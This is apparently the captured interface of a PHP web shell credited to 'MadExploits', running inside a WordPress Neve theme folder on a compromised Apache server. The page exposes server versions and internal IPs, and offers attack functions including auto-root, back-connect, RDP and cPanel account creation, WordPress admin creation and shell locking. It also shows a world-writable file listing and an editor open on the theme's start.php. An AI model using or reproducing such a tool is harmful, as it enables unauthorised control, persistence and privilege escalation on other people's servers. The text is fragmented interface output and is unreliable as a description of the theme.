Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
urlab /
wp-content /
themes /
neve /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
globals
[ DIR ]
drwxrwxrwx
header-footer-grid
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
page-templates
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
404.php
108
B
-rwxrwxrwx
500.php
178
B
-rwxrwxrwx
CHANGELOG.md
61.91
KB
-rwxrwxrwx
LICENSE.txt
17.67
KB
-rwxrwxrwx
archive-download.php
1.06
KB
-rwxrwxrwx
autoloader.php
4.05
KB
-rwxrwxrwx
comments.php
295
B
-rwxrwxrwx
footer-pwa.php
147
B
-rwxrwxrwx
footer.php
1.21
KB
-rwxrwxrwx
functions.php
5.04
KB
-rwxrwxrwx
header-pwa.php
680
B
-rwxrwxrwx
header.php
2.63
KB
-rwxrwxrwx
index.php
4.09
KB
-rwxrwxrwx
offline.php
178
B
-rwxrwxrwx
page.php
1.59
KB
-rwxrwxrwx
postcss.config.js
58
B
-rwxrwxrwx
readme.md
45.22
KB
-rwxrwxrwx
readme.txt
45.14
KB
-rwxrwxrwx
screenshot-mobile.png
17.77
KB
-rwxrwxrwx
screenshot.png
610.36
KB
-rwxrwxrwx
search.php
1.18
KB
-rwxrwxrwx
searchform.php
1.97
KB
-rwxrwxrwx
sidebar-shop.php
325
B
-rwxrwxrwx
sidebar.php
306
B
-rwxrwxrwx
single-download.php
1.21
KB
-rwxrwxrwx
single.php
1.17
KB
-rwxrwxrwx
start.php
2.51
KB
-rwxrwxrwx
style-main-new-rtl.css
45.92
KB
-rwxrwxrwx
style-main-new-rtl.min.css
38.82
KB
-rwxrwxrwx
style-main-new.css
45.95
KB
-rwxrwxrwx
style-main-new.min.css
38.81
KB
-rwxrwxrwx
style.css
1.52
KB
-rwxrwxrwx
taxonomy-download_category.php
1.07
KB
-rwxrwxrwx
taxonomy-download_tag.php
1.07
KB
-rwxrwxrwx
toolset-config.json
4.33
KB
-rwxrwxrwx
wpml-config.xml
1.08
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start.php
<?php /** * Start file handles bootstrap. * * @package Neve */ /** * Run theme functionality */ function neve_run() { define( 'NEVE_COMPATIBILITY_FEATURES', [ 'single_customizer' => true, 'repeater_control' => true, 'malformed_div_on_shop' => true, 'custom_post_types_enh' => true, 'mega_menu' => true, 'scroll_to_top_icons' => true, 'palette_logo' => true, 'custom_icon' => true, 'link_control' => true, 'page_header_support' => true, 'featured_post' => true, 'php81_react_ctrls_fix' => true, 'gradient_picker' => true, 'custom_post_types_sidebar' => true, 'meta_custom_fields' => true, 'sparks' => true, 'advanced_search_component' => true, 'submenu_style' => true, 'blog_hover_effects' => true, 'hfg_d_search_iconbutton' => true, // Dynamic icon selection or a button for search components 'restrict_content' => true, 'theme_dedicated_menu' => true, // Theme uses the new menu location for settings and sub-pages. 'track' => true, // Track theme usage. 'menu_icon_svg' => true, 'custom_payment_icons' => true, 'nested_ordering_control' => true, 'component_style_filter' => true, // @see Abstract_Component->add_style() method. ] ); $vendor_file = trailingslashit( get_template_directory() ) . 'vendor/autoload.php'; if ( is_readable( $vendor_file ) ) { require_once $vendor_file; } require_once 'autoloader.php'; $autoloader = new \Neve\Autoloader(); $autoloader->add_namespace( 'Neve', get_template_directory() . '/inc/' ); if ( defined( 'NEVE_PRO_SPL_ROOT' ) ) { $autoloader->add_namespace( 'Neve_Pro', NEVE_PRO_SPL_ROOT ); } $autoloader->register(); if ( class_exists( '\\Neve\\Core\\Core_Loader' ) ) { new \Neve\Core\Core_Loader(); } if ( class_exists( '\\Neve_Pro\\Core\\Loader' ) ) { /** * Legacy code, compatibility with old pro version. */ if ( is_file( NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Yoast_Breadcrumbs.php' ) ) { require_once NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Yoast_Breadcrumbs.php'; } if ( is_file( NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Language_Switcher.php' ) ) { require_once NEVE_PRO_SPL_ROOT . 'modules/header_footer_grid/components/Language_Switcher.php'; } \Neve_Pro\Core\Loader::instance(); } } neve_run();
Close